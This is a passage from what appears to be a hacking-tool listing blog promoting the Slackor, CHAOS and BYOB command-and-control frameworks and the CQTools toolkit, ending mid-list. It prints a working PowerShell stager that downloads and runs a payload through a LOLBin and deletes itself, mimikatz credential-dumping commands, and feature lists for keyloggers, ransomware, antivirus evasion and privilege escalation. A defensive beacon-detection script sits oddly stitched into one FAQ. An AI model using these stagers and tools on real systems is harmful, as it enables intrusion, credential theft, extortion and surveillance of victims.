<a href="https://1.bp.blogspot.com/-ij1bpUyGyDI/XRqRgFlCGrI/AAAAAAAAPfk/DPEebDyZIGAk22x9tuLXs44YSyW4T-PFACLcBGAs/s1600/Slackor_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="349" data-original-width="1024" height="218" src="https://1.bp.blogspot.com/-ij1bpUyGyDI/XRqRgFlCGrI/AAAAAAAAPfk/DPEebDyZIGAk22x9tuLXs44YSyW4T-PFACLcBGAs/s640/Slackor_2.png" width="640" /></a></div>
<br />
<br />
<br />
This tool is released as a proof of concept. Be sure to read and understand the <a href="https://api.slack.com/developer-policy" rel="nofollow" target="_blank" title="Slack App Developer Policy">Slack App Developer Policy</a> before creating any Slack apps.<br />
<br />
<span style="font-size: x-large;"><b>Setup</b></span><br />
<strong>Note: The server is written in Python 3</strong><br />
For this to work you need:<br />
<ul>
<li> A Slack Workspace<br />
</li>
<li> <a href="https://api.slack.com/apps" rel="nofollow" target="_blank" title="Register an app">Register an app</a> with the following permissions:<br />
<ul>
<li><strong>channels:read</strong></li>
<li><strong>channels:history</strong></li>
<li><strong>channels:write</strong></li>
<li><strong>files:write:user</strong></li>
<li><strong>files:read</strong></li>
</ul>
</li>
<li> Create a bot<br />
</li>
</ul>
This repo contains five files:<br />
<ul>
<li><code>install.sh</code> Installs dependencies</li>
<li><code>setup.py</code> The script to create the Slack channels, database, and implant</li>
<li><code>server.py</code> The Slackor server, designed to be run on Linux</li>
<li><code>template.go</code> Template for the generated implant</li>
<li><code>requirements.txt</code> Python dependencies (installed automatically)</li>
</ul>
To get started:<br />
<ul>
<li>Run <code>install.sh</code></li>
<li>Run <code>setup.py</code> <ul>
<li>Supply the <em>OAuth Access Token</em> and <em>Bot User OAuth Access Token</em> from your app</li>
</ul>
</li>
</ul>
After running the script successfully, a file <code>agent.exe</code> will be created. It will be a 64-bit Go binary packed with UPX.<br />
After starting server.py on a Linux host, execute <code>agent.exe</code> on your target Windows host.<br />
Run the "stager" module to generate a one-liner and other droppers.<br />
<pre><code>powershell.exe iwr [URL] -o C:\Users\Public\[NAME].exe; forfiles.exe /p c:\windows\system32 /m svchost.exe /c C:\Users\Public\[NAME]; timeout 2; del C:\Users\Public\[NAME].exe</code></pre>
This will execute Invoke-WebRequest (PowerShell v3+) to download the payload, execute it using a <a href="https://lolbas-project.github.io/lolbas/Binaries/Forfiles/" rel="nofollow" target="_blank" title="LOLBin">LOLBin</a>, and then delete itself once killed. This is a working example, but the command can be tweaked to use another download method or execution method.<br />
<br />
<span style="font-size: x-large;"><b>Usage</b></span><br />
Type "help" or press [TAB] to see a list of available commands. Type "help [COMMAND]" to see a description of that command.<br />
<code>(Slackor)</code><br />
<ul>
<li><strong>Help</strong> - Displays help menu</li>
<li><strong>interact</strong> - Interact with an agent</li>
<li><strong>list</strong> - List all registered agents</li>
<li><strong>remove</strong> - kill and remove an agent</li>
<li><strong>revive</strong> - Sends a signal to all agents to re-register with the server</li>
<li><strong>stager</strong> - Generates a one-liner to download and execute the implant</li>
<li><strong>quit</strong> - Quit the program</li>
<li><strong>wipefiles</strong> - Deletes all uploaded files out of Slack</li>
</ul>
Once an agent checks in, you can interact with it. Use "interact [AGENT]" to enter an agent prompt. Type "help" or press [TAB] to see a list of available commands.<br />
<code>(Slackor:AGENT)</code><br />
<ul>
<li><strong>back</strong> - Return to the main menu</li>
<li><strong>beacon</strong> - Change the amount of time between each check-in by an agent (default is 5 seconds)</li>
<li><strong>bypassuac</strong> - Attempts to spawn a high integrity agent</li>
<li><strong>cleanup</strong> - Removes persistence artifacts</li>
<li><strong>clipboard</strong> - Retrieves the contents of the clipboard</li>
<li><strong>defanger</strong> - Attempts to de-fang Windows Defender</li>
<li><strong>download</strong> - Download a file from the agent to the Slackor server</li>
<li><strong>duplicate</strong> - Causes the agent to spawn another invocation of itself</li>
<li><strong>getsystem</strong> - Spawns an agent as NT AUTHORITY\SYSTEM</li>
<li><strong>help</strong> - Displays help menu</li>
<li><strong>keyscan</strong> - Starts a keylogger on the agent</li>
<li><strong>kill</strong> - Kill the agent</li>
<li><strong>minidump</strong> - Dumps memory from lsass.exe and downloads it</li>
<li><strong>persist</strong> - Creates persistence by implanting a binary in an ADS</li>
<li><strong>samdump</strong> - Attempts to dump the SAM file for offline hash extraction</li>
<li><strong>screenshot</strong> - Takes a screenshot of the desktop and retrieves it</li>
<li><strong>shellcode</strong> - Executes x64 raw shellcode</li>
<li><strong>sleep</strong> - Cause the agent to sleep once (enter time in seconds)</li>
<li><strong>sysinfo</strong> - Displays the current user, OS version, system architecture, and number of CPU cores</li>
<li><strong>upload</strong> - Upload a file to the agent from the Slackor server</li>
<li><strong>wget</strong> - Pull down arbitrary files over HTTP/HTTPS</li>
</ul>
<br />
<span style="font-size: large;"><b>OPSEC Considerations</b></span><br />
Command output and downloaded files are AES encrypted in addition to TLS transport encryption.<br />
Modules will warn you before performing tasks that write to disk.<br />
When executing shell commands, take note that cmd.exe will be executed. This may be monitored on the host. Here are several OPSEC safe commands that will NOT execute cmd.exe:<br />
<ul>
<li><strong>cat</strong> - prints file content</li>
<li><strong>cd</strong> - change directory</li>
<li><strong>hostname</strong> - Displays the name of the host</li>
<li><strong>ifconfig</strong> - Displays interface information</li>
<li><strong>ls</strong> - list directory contents</li>
<li><strong>mkdir</strong> - Creates a directory</li>
<li><strong>pwd</strong> - prints the current working directory</li>
<li><strong>rm</strong> - removes a file</li>
<li><strong>rmdir</strong> - removes a directory</li>
<li><strong>whoami / getuid</strong> - prints the current user</li>
</ul>
<br />
<span style="font-size: x-large;"><b>Credits</b></span><br />
<ul>
<li><a href="https://github.com/EgeBalci" rel="nofollow" target="_blank" title="https://github.com/EgeBalci">https://github.com/EgeBalci</a> - Functions adapted from <a href="https://github.com/EgeBalci/HERCULES" rel="nofollow" target="_blank" title="HERCULES">HERCULES</a> and <a href="https://github.com/EgeBalci/EGESPLOIT" rel="nofollow" target="_blank" title="EGESPLOIT">EGESPLOIT</a></li>
<li><a href="https://github.com/SaturnsVoid" rel="nofollow" target="_blank" title="https://github.com/SaturnsVoid">https://github.com/SaturnsVoid</a> - <a href="https://www.kitploit.com/search/label/Keylogger" target="_blank" title="Keylogger">Keylogger</a> adapted from <a href="https://github.com/SaturnsVoid/GoBot2" rel="nofollow" target="_blank" title="GoBot2">GoBot2</a></li>
<li><a href="https://github.com/vyrus001" rel="nofollow" target="_blank" title="https://github.com/vyrus001">https://github.com/vyrus001</a> - x64 shellcode execution <a href="https://github.com/vyrus001/shellGo" rel="nofollow" target="_blank" title="shellGo">shellGo</a></li>
<li>Crypto functions adopted from <a href="https://www.golang123.com/topic/1686" rel="nofollow" target="_blank" title="https://www.golang123.com/topic/1686">https://www.golang123.com/topic/1686</a></li>
<li>Persistence idea from <a href="https://enigma0x3.net/2015/03/05/using-alternate-data-streams-to-persist-on-a-compromised-machine/" rel="nofollow" target="_blank" title="Enigma0x3">Enigma0x3</a></li>
<li>Minidump adopted from <a href="https://github.com/Ne0nd0g/merlin" rel="nofollow" target="_blank" title="Merlin">Merlin</a>, credit to <a href="https://github.com/C-Sto" rel="nofollow" target="_blank" title="C-Sto">C-Sto</a></li>
<li>Screenshot code from <a href="https://github.com/kbinani/screenshot" rel="nofollow" target="_blank" title="kbinani">kbinani</a></li>
<li>Clipboard code from <a href="https://github.com/atotto/clipboard" rel="nofollow" target="_blank" title="atotto">atotto</a></li>
<li>Stager generator from <a href="https://github.com/hlldz/SpookFlare" rel="nofollow" target="_blank" title="hlldz">hlldz</a></li>
<li>UAC bypass by <a href="https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/" rel="nofollow" target="_blank" title="winscripting.blog">winscripting.blog</a></li>
<li>Lulzbin find by <a href="https://twitter.com/vector_sec/status/896049052642533376%5D" rel="nofollow" target="_blank" title="@vector_sec">@vector_sec</a></li>
<li>Countless threads on StackOverflow</li>
<li>Thanks to <a href="https://github.com/SecureAuthCorp/impacket" rel="nofollow" target="_blank" title="impacket">impacket</a> for dumping hashes from SAM/SYS/SECURITY reg hives.</li>
<li>LSASS dump credential extraction made possible using <a href="https://github.com/skelsec/pypykatz" rel="nofollow" target="_blank" title="pypykatz">pypykatz</a> by skelsec</li>
</ul>
<br />
<span style="font-size: x-large;"><b>Future goals</b></span><br />
<ul>
<li>DOSfuscation</li>
<li>Reflectively load DLL/PE - <a href="https://github.com/vyrus001/go-mimikatz" rel="nofollow" target="_blank" title="https://github.com/vyrus001/go-mimikatz">https://github.com/vyrus001/go-mimikatz</a></li>
<li>Execute C# assemblies in memory - <a href="https://github.com/lesnuages/go-execute-assembly" rel="nofollow" target="_blank" title="https://github.com/lesnuages/go-execute-assembly">https://github.com/lesnuages/go-execute-assembly</a></li>
<li>Source code <a href="https://www.kitploit.com/search/label/Obfuscation" target="_blank" title="obfuscation">obfuscation</a> <a href="https://github.com/unixpickle/gobfuscate" rel="nofollow" target="_blank" title="https://github.com/unixpickle/gobfuscate">https://github.com/unixpickle/gobfuscate</a></li>
</ul>
<br />
<span style="font-size: x-large;"><b>FAQ:</b></span><br />
<strong>Is this safe to use for red teams/pentesting?</strong><br />
Yes, given some conditions. While the data is encrypted in transit, the agent contains the key for decryption. Anyone who acquires a copy of the agent could <a href="https://www.kitploit.com/search/label/Reverse%20Engineer" target="_blank" title="reverse engineer">reverse engineer</a> it and extract the API keys and the AES secret key. Anyone who compromises or otherwise gains access to the workspace would be able to retrieve all data within it. For this reason, it is not recommended to re-use infrastructure against multiple organizations.<br />
<strong>What about Mimikatz?</strong><br />
The implant does not have in-memory password dumping functionality. If you need logonPasswords, you can try the following:<br />
<pre><code>(Slackor: AGENT)minidump</code></pre>
This will automatically extract passwords with pypykatz. Alternatively, you can use Mimikatz on Windows.<br />
<pre><code>>mimikatz.exe
mimikatz # sekurlsa::Minidump lsassdump.dmp
mimikatz # sekurlsa::logonPasswords</code></pre>
<strong>Is it cross-platform?</strong><br />
Not yet. It has not been fully tested on a variety of systems. The server was designed to run on <a href="https://www.kitploit.com/search/label/Kali%20Linux" target="_blank" title="Kali Linux">Kali Linux</a> and the agent on Windows 10.<br />
<strong>How well does it scale?</strong><br />
Scalability is limited by the Slack API. If you have multiple agents, consider increasing the beacon interval of beacons not in use.<br />
<strong>Is it <a href="https://www.kitploit.com/search/label/Vulnerable" target="_blank" title="vulnerable">vulnerable</a> to standard beacon analysis?</strong><br />
Currently each beacon has 20% jitter built in, and beacon times can be customized. Agent check-in request and response packets will be about the same size each time as long as no new commands are received.<br />
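The two properties this answer names, a fixed interval softened by 20% jitter and near-constant request sizes, are exactly what a defender's beacon analysis keys on. The following is an added example and not Slackor code: it scores a series of check-in events by the regularity of their spacing and size, using a constructed beacon-like series and a constructed bursty series. The thresholds, the 60 second interval, the byte counts and the PRNG seeds are all assumptions chosen for the illustration.

```javascript
// Added example, not part of Slackor: a defender-side check for the
// beaconing pattern the FAQ describes (fixed interval with 20% jitter and
// near-constant request size). It scores a series of check-in events by the
// regularity of their spacing and size. Every input here is constructed.

// Small deterministic PRNG so the constructed samples are reproducible.
function makeLcg(seed) {
  let s = seed >>> 0;
  return () => {
    s = (Math.imul(s, 1664525) + 1013904223) >>> 0;
    return s / 2 ** 32; // uniform in [0, 1)
  };
}

// Constructed beacon traffic: n check-ins spaced `interval` seconds apart
// with +/- `jitter` (as a fraction) uniform jitter, each 512 +/- 8 bytes.
function beaconSample(n = 40, interval = 60, jitter = 0.2, seed = 7) {
  const rnd = makeLcg(seed);
  const events = [];
  let t = 0;
  for (let i = 0; i < n; i++) {
    t += interval * (1 + jitter * (2 * rnd() - 1));
    events.push({ ts: t, bytes: 512 + Math.floor(rnd() * 17) - 8 });
  }
  return events;
}

// Constructed interactive traffic: exponentially distributed gaps (mean 60 s)
// and request sizes anywhere between 200 and 20000 bytes.
function browsingSample(n = 40, seed = 11) {
  const rnd = makeLcg(seed);
  const events = [];
  let t = 0;
  for (let i = 0; i < n; i++) {
    t += -Math.log(1 - rnd()) * 60;
    events.push({ ts: t, bytes: 200 + Math.floor(rnd() * 19801) });
  }
  return events;
}

// Mean and coefficient of variation (stddev / mean) of a list of numbers.
function cv(values) {
  const mean = values.reduce((a, b) => a + b, 0) / values.length;
  const variance = values.reduce((a, v) => a + (v - mean) ** 2, 0) / values.length;
  return { mean, cv: Math.sqrt(variance) / mean };
}

// Score one client's outbound events to a single destination. Uniform
// +/-20% jitter gives a gap stddev of 0.2/sqrt(3) of the interval, i.e. a
// gap CV near 0.12, so a 0.3 threshold still catches it while bursty human
// traffic (gap CV around 1) is not flagged. Size regularity is a second,
// independent signal, since the FAQ notes the packets stay about the same size.
function beaconScore(events, { gapCvMax = 0.3, sizeCvMax = 0.1, minEvents = 10 } = {}) {
  if (events.length < minEvents) {
    return { periodic: false, reason: `fewer than ${minEvents} events` };
  }
  const gaps = events.slice(1).map((e, i) => e.ts - events[i].ts);
  const gap = cv(gaps);
  const size = cv(events.map(e => e.bytes));
  return {
    periodic: gap.cv < gapCvMax && size.cv < sizeCvMax,
    intervalSeconds: gap.mean,
    gapCv: gap.cv,
    sizeCv: size.cv,
  };
}

console.log('beacon-like:', beaconScore(beaconSample()));
console.log('interactive:', beaconScore(browsingSample()));
```

Run it with Node. In practice the events would be grouped per source host and destination from proxy or NetFlow records before scoring; the thresholds are a starting point and should be tuned against the environment's own baseline, since software updaters and monitoring agents are also periodic.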
<strong>Why did you do [x] when a better way to do it is [y]?</strong><br />
I tried my best. PRs are encouraged :)<br />
<strong>It gets caught by AV!</strong><br />
The built-in HTA stager is created by <a href="https://github.com/hlldz/SpookFlare" rel="nofollow" target="_blank" title="SpookFlare">SpookFlare</a> which is based on <a href="https://github.com/nccgroup/demiguise" rel="nofollow" target="_blank" title="Demiguise">Demiguise</a>. If you want your droppers to not get snagged you probably want to go custom. The built in droppers are just there to get you started.<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Coalfire-Research/Slackor" rel="nofollow" target="_blank" title="Download Slackor">Download Slackor</a></span></b></div>
CQTools - The New Ultimate Windows Hacking Toolkit (2019-05-08)<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-tLgxULPDSJg/XNJZEmfP-qI/AAAAAAAAOy4/NTTIz2PyXYA3eTp37bm_V3Ead_qs-VUEwCLcBGAs/s1600/cqurebhasia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="576" data-original-width="1024" height="360" src="https://1.bp.blogspot.com/-tLgxULPDSJg/XNJZEmfP-qI/AAAAAAAAOy4/NTTIz2PyXYA3eTp37bm_V3Ead_qs-VUEwCLcBGAs/s640/cqurebhasia.jpg" width="640" /></a></div>
<br />
<div style="text-align: justify;">
CQURE Team has prepared tools used during penetration testing and packed them into a toolkit named CQTools. This toolkit allows you to deliver complete attacks within the infrastructure: starting with sniffing and spoofing, going through information extraction, password extraction, custom shell generation, custom payload generation, hiding code from antivirus solutions and various keyloggers, and leveraging this information to deliver attacks. Some of the tools are based on discoveries that were released to the world for the first time by CQURE Team. CQURE was the first team that did full <a href="https://www.kitploit.com/search/label/Reverse%20Engineering" target="_blank">reverse engineering</a> of DPAPI (Data Protection Application Programming Interface) and prepared the first public tool that allows monitoring of the WSL (Windows Subsystem for Linux) feature.</div>
<a name='more'></a><br />
<div style="text-align: justify;">
This toolkit allows you to deliver complete attacks within the infrastructure: starting with sniffing and spoofing, going through information extraction, password extraction, custom shell generation, custom payload generation, hiding code from antivirus solutions and various <a href="https://www.kitploit.com/search/label/Keylogger" target="_blank">keyloggers</a>, and leveraging this information to deliver attacks. Some of the tools are based on discoveries that were released to the world for the first time by CQURE Team; some of the tools took years to complete, and all of the tools work in a straightforward manner. CQTools is the ultimate toolkit to have when delivering a penetration test. The tools work simply, and we use them in practice during our cybersecurity assignments. Come and have a look at how our CQTools can boost your penetration testing experience!</div>
<br />
• <a href="http://i.blackhat.com/asia-19/Thu-March-28/bh-asia-Januszkiewicz-CQTools-New-Ultimate-Hacking-Toolkit.pdf" target="_blank">Download Presentation Slides</a><br />
• <a href="http://i.blackhat.com/asia-19/Thu-March-28/bh-asia-Januszkiewicz-CQTools-New-Ultimate-Hacking-Toolkit-wp.pdf" target="_blank">Download White Paper</a><br />
<br />
More info: <a href="https://cqureacademy.com/blog/no-category/black-hat-asia-2019-tools" rel="nofollow" target="_blank">https://cqureacademy.com/blog/no-category/black-hat-asia-2019-tools</a><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://4f2bcn3u2m2u2z7ghc17a5jm-wpengine.netdna-ssl.com/wp-content/uploads/2019/03/cqtools-the-new-ultimate-hacking-toolkit-black-hat-asia-2019-2.7z" target="_blank">Download CQTools</a></span></b></div>
<div style="text-align: center;">
<b><span style="font-size: large;">Password: CQUREAcademy#123!</span></b></div>
CHAOS Framework v3.0 - Generate Payloads And Control Remote Windows Systems (2019-04-04)<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-6qg4hfveC28/XKJ02_nGSGI/AAAAAAAAOYg/dBERKbK-EOYMMsBKdpOVjKzqg9vbIQOJgCLcBGAs/s1600/CHAOS_11_screenshot.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="480" data-original-width="800" height="384" src="https://4.bp.blogspot.com/-6qg4hfveC28/XKJ02_nGSGI/AAAAAAAAOYg/dBERKbK-EOYMMsBKdpOVjKzqg9vbIQOJgCLcBGAs/s640/CHAOS_11_screenshot.gif" width="640" /></a></div>
<div align="center">
<br /></div>
<div style="text-align: left;">
CHAOS is a PoC that allows you to generate payloads and control remote operating systems.</div>
<br />
<span style="font-size: x-large;"><b>Features</b></span><br />
<table>
<tbody>
<tr> <th align="left">Feature</th> <th align="center">Windows</th> <th align="center">Mac</th> <th align="center">Linux</th> </tr>
<tr> <td align="left"><code>Reverse Shell</code></td> <td align="center">X</td> <td align="center">X</td> <td align="center">X</td> </tr>
<tr> <td align="left"><code>Download File</code></td> <td align="center">X</td> <td align="center">X</td> <td align="center">X</td> </tr>
<tr> <td align="left"><code>Upload File</code></td> <td align="center">X</td> <td align="center">X</td> <td align="center">X</td> </tr>
<tr> <td align="left"><code>Screenshot</code></td> <td align="center">X</td> <td align="center">X</td> <td align="center">X</td> </tr>
<tr> <td align="left"><code>Keylogger</code></td> <td align="center">X</td> <td align="center"></td> <td align="center"></td> </tr>
<tr> <td align="left"><code>Persistence</code></td> <td align="center">X</td> <td align="center"></td> <td align="center"></td> </tr>
<tr> <td align="left"><code>Open URL</code></td> <td align="center">X</td> <td align="center">X</td> <td align="center">X</td> </tr>
<tr> <td align="left"><code>Get OS Info</code></td> <td align="center">X</td> <td align="center">X</td> <td align="center">X</td> </tr>
<tr> <td align="left"><code>Fork Bomb</code></td> <td align="center">X</td> <td align="center">X</td> <td align="center">X</td> </tr>
<tr> <td align="left"><code>Run Hidden</code></td> <td align="center">X</td> <td align="center"></td> <td align="center"></td> </tr>
</tbody></table>
<br />
<span style="font-size: x-large;"><b>Tested On</b></span><br />
<strong>Kali Linux - ROLLING EDITION</strong><br />
<a name='more'></a><br />
<span style="font-size: x-large;"><b>How to Install</b></span><br />
<div>
<pre><code># Install dependencies
$ sudo apt install golang git -y
# Get this repository
$ go get github.com/tiagorlampert/CHAOS
# Get the external Go dependencies (all of them are required)
$ go get github.com/kbinani/screenshot
$ go get github.com/lxn/win
$ go get github.com/matishsiao/goInfo
$ go get golang.org/x/sys/windows
# You may see the message "package github.com/lxn/win: build constraints exclude all Go files".
# This happens because these libraries are Windows-only, but they are still needed to build the Windows payload.
# Go into the repository
$ cd ~/go/src/github.com/tiagorlampert/CHAOS
# Run
$ go run main.go</code></pre>
</div>
<br />
<span style="font-size: x-large;"><b>How to Use</b></span><br />
<table>
<tbody>
<tr> <th align="left">Command</th> <th align="left">On HOST does...</th> </tr>
<tr> <td align="left"><code>generate</code></td> <td align="left">Generate a payload (e.g. <code>generate lhost=192.168.0.100 lport=8080 fname=chaos --windows</code>)</td> </tr>
<tr> <td align="left"><code>lhost=</code></td> <td align="left">Specify an IP address for the connection</td> </tr>
<tr> <td align="left"><code>lport=</code></td> <td align="left">Specify a port for connection</td> </tr>
<tr> <td align="left"><code>fname=</code></td> <td align="left">Specify a filename to output</td> </tr>
<tr> <td align="left"><code>--windows</code></td> <td align="left">Target Windows</td> </tr>
<tr> <td align="left"><code>--macos</code></td> <td align="left">Target Mac OS</td> </tr>
<tr> <td align="left"><code>--linux</code></td> <td align="left">Target Linux</td> </tr>
<tr> <td align="left"><code>listen</code></td> <td align="left">Listen for a new connection (e.g. <code>listen lport=8080</code>)</td> </tr>
<tr> <td align="left"><code>serve</code></td> <td align="left">Serve files</td> </tr>
<tr> <td align="left"><code>exit</code></td> <td align="left">Quit this program</td> </tr>
</tbody></table>
<table>
<tbody>
<tr> <th align="left">Command</th> <th align="left">On TARGET does...</th> </tr>
<tr> <td align="left"><code>download</code></td> <td align="left">File Download</td> </tr>
<tr> <td align="left"><code>upload</code></td> <td align="left">File Upload</td> </tr>
<tr> <td align="left"><code>screenshot</code></td> <td align="left">Take a Screenshot</td> </tr>
<tr> <td align="left"><code>keylogger_start</code></td> <td align="left">Start <a href="http://www.kitploit.com/search/label/Keylogger" rel="nofollow" target="_blank" title="Keylogger">Keylogger</a> session</td> </tr>
<tr> <td align="left"><code>keylogger_show</code></td> <td align="left">Show Keylogger session logs</td> </tr>
<tr> <td align="left"><code>persistence_enable</code></td> <td align="left">Install at Startup</td> </tr>
<tr> <td align="left"><code>persistence_disable</code></td> <td align="left">Remove from Startup</td> </tr>
<tr> <td align="left"><code>getos</code></td> <td align="left">Get OS name</td> </tr>
<tr> <td align="left"><code>lockscreen</code></td> <td align="left">Lock the OS screen</td> </tr>
<tr> <td align="left"><code>openurl</code></td> <td align="left">Open the given URL</td> </tr>
<tr> <td align="left"><code>bomb</code></td> <td align="left">Run Fork Bomb</td> </tr>
<tr> <td align="left"><code>clear</code></td> <td align="left">Clear the Screen</td> </tr>
<tr> <td align="left"><code>back</code></td> <td align="left">Close connection but keep running on target</td> </tr>
<tr> <td align="left"><code>exit</code></td> <td align="left">Close connection and exit on target</td> </tr>
</tbody></table>
<br />
<span style="font-size: x-large;"><b>Video</b></span><br />
<div align="center">
<br />
<iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/Fq_0yDPFjYE" width="560"></iframe></div>
<br />
<span style="font-size: x-large;"><b>FAQ</b></span><br />
<blockquote>
<br />
<span style="font-size: large;"><b>Why does Keylogger <a href="http://www.kitploit.com/search/label/Capture" rel="nofollow" target="_blank" title="capture">capture</a> all uppercase letters?</b></span><br />
All the letters obtained using the keylogger are uppercase letters. It is a known issue; if anyone knows how to fix the keylogger function using Go, please contact me or open an issue.</blockquote>
<blockquote>
<br />
<span style="font-size: large;"><b>Why is it necessary to get and install external libraries?</b></span><br />
To implement the screenshot function I used third-party libraries; you can check them at <a href="https://github.com/kbinani/screenshot" rel="nofollow" target="_blank" title="https://github.com/kbinani/screenshot">https://github.com/kbinani/screenshot</a> and <a href="https://github.com/lxn/win" rel="nofollow" target="_blank" title="https://github.com/lxn/win">https://github.com/lxn/win</a>. You must download and install them to generate the payload.</blockquote>
<br />
<span style="font-size: x-large;"><b>Contact</b></span><br />
<strong><a href="mailto:tiagorlampert@gmail.com" rel="nofollow" target="_blank" title="tiagorlampert@gmail.com">tiagorlampert@gmail.com</a></strong><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/tiagorlampert/CHAOS" rel="nofollow" target="_blank" title="Download CHAOS">Download CHAOS</a></span></b></div>
BYOB - Build Your Own Botnet (2018-09-30)<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-8x0RKQ35Ppo/W6magirLCaI/AAAAAAAAMnU/Ww9LLsX8VOobqz3HhN71nu68S-YYJDthgCLcBGAs/s1600/byob_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="356" data-original-width="356" height="400" src="https://3.bp.blogspot.com/-8x0RKQ35Ppo/W6magirLCaI/AAAAAAAAMnU/Ww9LLsX8VOobqz3HhN71nu68S-YYJDthgCLcBGAs/s400/byob_1.png" width="400" /></a></div>
<br />
<span style="font-size: x-large;"><b>BYOB (Build Your Own Botnet)</b></span><br />
<br />
<div style="text-align: justify;">
<strong>Disclaimer</strong>: This project should be used for authorized testing or educational purposes only.</div>
<div style="text-align: justify;">
BYOB is an open-source project that provides a framework for security researchers and developers to build and operate a basic botnet to deepen their understanding of the sophisticated malware that infects millions of devices every year and spawns modern botnets, in order to improve their ability to develop counter-measures against these threats.</div>
<div style="text-align: justify;">
It is designed to allow developers to easily implement their own code and add cool new features <em>without</em> having to write a <strong>RAT</strong> (Remote Administration Tool) or a <strong>C2</strong> (Command & Control server) from scratch.</div>
<div style="text-align: justify;">
<em>The RAT's key feature is that arbitrary code/files can be remotely loaded into memory from the C2 and executed on the target machine without writing anything to the disk.</em></div>
<a name='more'></a><br />
<span style="font-size: large;"><b>Server</b></span><br />
<code>usage: server.py [-h] [-v] [--host HOST] [--port PORT] [--database DATABASE]</code><br />
<em>Command & control server with persistent database and console</em><br />
<ul>
<li> <strong>Console-Based User-Interface</strong>: streamlined console interface for controlling client host machines remotely via reverse TCP shells which provide direct terminal access to the client host machines<br />
</li>
<li> <strong>Persistent SQLite Database</strong>: lightweight database that stores identifying information about client host machines, allowing reverse TCP shell sessions to persist through disconnections of arbitrary duration and enabling long-term reconnaissance<br />
</li>
<li> <strong>Client-Server Architecture</strong>: all python packages/modules installed locally are automatically made available for clients to remotely import without writing them to the disk of the target machines, allowing clients to use modules which require packages not installed on the target machines<br />
</li>
</ul>
<br />
<span style="font-size: large;"><b>Client</b></span><br />
<code>usage: client.py [-h] [-v] [--name NAME] [--icon ICON] [--pastebin API] [--encrypt] [--obfuscate] [--compress] [--compile] host port [module [module ...]]</code><br />
<em>Generate fully-undetectable clients with staged payloads, remote imports, and unlimited modules</em><br />
<ul>
<li> <strong>Remote Imports</strong>: remotely import third-party packages from the server without writing them to the disk or downloading/installing them<br />
</li>
<li> <strong>Nothing Written To The Disk</strong>: clients never write anything to the disk - not even temporary files (zero IO system calls are made) because remote imports allow arbitrary code to be dynamically loaded into memory and directly imported into the currently running process<br />
</li>
<li> <strong>Zero Dependencies (Not Even Python Itself)</strong>: client runs with just the python standard library, remotely imports any non-standard packages/modules from the server, and can be compiled with a standalone python interpreter into a portable binary executable formatted for any platform/architecture, allowing it to run on anything, even when Python itself is missing on the target host<br />
</li>
<li> <strong>Add New Features With Just 1 Click</strong>: any python script, module, or package you copy to the <code>./byob/modules/</code> directory automatically becomes remotely importable & directly usable by every client while your command & control server is running<br />
</li>
<li> <strong>Write Your Own Modules</strong>: a basic module template is provided in <code>./byob/modules/</code> directory to make writing your own modules a straight-forward, hassle-free process<br />
</li>
<li> <strong>Run Unlimited Modules Without Bloating File Size</strong>: use remote imports to add unlimited features without adding a single byte to the client's file size<br />
</li>
<li> <strong>Fully Updatable</strong>: each client will periodically check the server for new content available for remote import, and will dynamically update its in-memory resources if anything has been added/removed<br />
</li>
<li> <strong>Platform Independent</strong>: everything is written in Python (a platform-agnostic language) and the clients generated can optionally be compiled into a portable executable (<em>Windows</em>) or bundled into a standalone application (<em>macOS</em>)<br />
</li>
<li> <strong>Bypass Firewalls</strong>: clients connect to the command & control server via reverse TCP connections, which will bypass most <a href="http://www.kitploit.com/search/label/Firewalls">firewalls</a> because the default filter configurations primarily block incoming connections<br />
</li>
<li> <strong>Counter-Measure Against Antivirus</strong>: avoids being analyzed by <a href="http://www.kitploit.com/search/label/Antivirus">antivirus</a> by blocking processes with names of known antivirus products from spawning<br />
</li>
<li> <strong>Encrypt Payloads To Prevent Analysis</strong>: the main client payload is encrypted with a random 256-bit key which exists solely in the payload stager which is generated along with it<br />
</li>
<li> <strong>Prevent Reverse-Engineering</strong>: by default, clients will abort execution if a <a href="http://www.kitploit.com/search/label/Virtual%20Machine">virtual machine</a> or sandbox is detected<br />
</li>
</ul>
<br />
<span style="font-size: large;"><b>Modules</b></span><br />
<em>Post-exploitation modules that are remotely importable by clients</em><br />
<ol>
<li><strong>Keylogger</strong> (<code>byob.modules.keylogger</code>): logs the user’s keystrokes & the window name entered</li>
<li><strong>Screenshot</strong> (<code>byob.modules.screenshot</code>): take a screenshot of current user’s desktop</li>
<li><strong>Webcam</strong> (<code>byob.modules.webcam</code>): view a live stream or capture image/video from the webcam</li>
<li><strong>Ransom</strong> (<code>byob.modules.ransom</code>): encrypt files & generate random BTC wallet for ransom payment</li>
<li><strong>Outlook</strong> (<code>byob.modules.outlook</code>): read/search/upload emails from the local Outlook client</li>
<li><strong>Packet Sniffer</strong> (<code>byob.modules.packetsniffer</code>): run a packet sniffer on the host network & upload .pcap file</li>
<li><strong>Persistence</strong> (<code>byob.modules.persistence</code>): establish persistence on the host machine using 5 different methods</li>
<li><strong>Phone</strong> (<code>byob.modules.phone</code>): read/search/upload text messages from the client smartphone</li>
<li><strong>Escalate Privileges</strong> (<code>byob.modules.escalate</code>): attempt UAC bypass to gain unauthorized administrator privileges</li>
<li><strong>Port Scanner</strong> (<code>byob.modules.portscanner</code>): scan the local network for other online devices & open ports</li>
<li><strong>Process Control</strong> (<code>byob.modules.process</code>): list/search/kill/monitor currently running processes on the host</li>
</ol>
<br />
<span style="font-size: large;"><b>Core</b></span><br />
<em>Core framework modules used by the generator and the server</em><br />
<ol>
